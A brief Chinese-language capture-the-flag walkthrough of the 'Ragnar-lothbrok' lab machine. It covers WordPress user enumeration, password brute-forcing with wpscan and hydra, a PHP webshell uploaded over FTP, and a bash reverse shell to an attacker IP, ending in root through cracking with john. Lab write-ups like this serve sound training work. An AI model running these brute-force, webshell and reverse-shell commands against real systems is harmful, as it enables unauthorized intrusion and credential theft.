Ragnar-lothbrok
信息搜集
存活检测
详细扫描
后台网页扫描
网站信息搜集
-
secret “秘密”网页
将密文保存到 password.txt
-
此页面使用了 wordpress CMS
-
疑似用户 ragnar
-
wpscan 也爆破出了用户 ragnar
wpscan --url http://10.4.7.155/wordpress/ --enumerate u
密码获取
- 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码
尝试网页登录爆破
wpscan --url http://10.4.7.155/wordpress/ --usernames ragnar --passwords password.txt
爆破出密码 ubbe
ssh 爆破
hydra -l ragnar -P password.txt ssh://10.4.7.155
ragnar
密码为 lagertha
漏洞利用
-
查看 ftp 中有用的信息
-
未搜集到有用信息
-
网页登录
10.4.7.155/wordpress/wp-login.php ragnar ubbe
卡的登不上去
-
直接尝试 ftp 上传一句话木马
put shell.php
成功上传
-
蚁剑连接,发现可以连接
-
打开蚁剑中虚拟终端,反弹进 kali
bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'
成功反弹
提权
-
信息搜集
切换到 home 目录,发现有用户 ragnar
-
尝试使用其 web 和 ftp 密码登录
密码未 ftp 登陆密码
lagertha
-
查找敏感文件
在 秘密 文件中可以直接看到 root 加密后的密码
-
john 爆破
-
切换 root
成功提权